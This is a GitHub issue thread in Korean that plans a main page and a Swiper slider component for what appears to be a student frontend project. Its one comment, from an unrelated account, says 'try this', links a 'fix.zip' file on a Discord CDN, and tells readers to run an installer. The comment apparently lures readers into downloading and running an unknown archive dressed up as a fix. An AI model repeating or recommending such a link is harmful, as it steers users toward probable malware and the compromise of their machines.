### ISSUE TITLE
메인페이지 구현 및 컴포넌트 작성

### ISSUE THREAD

**Issue by Lee-Jinyong** [FRONTENDSCHOOL10/LEEKIM#10]
## 어떤 기능인가요?

> 메인페이지 구현
> 메인페이지에 사용되는 컴포넌트 구현

## 작업 상세 내용

- [ ] 메인페이지 구현
- [ ] 스와이퍼를  사용한 슬라이더 컴포넌트 구현

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
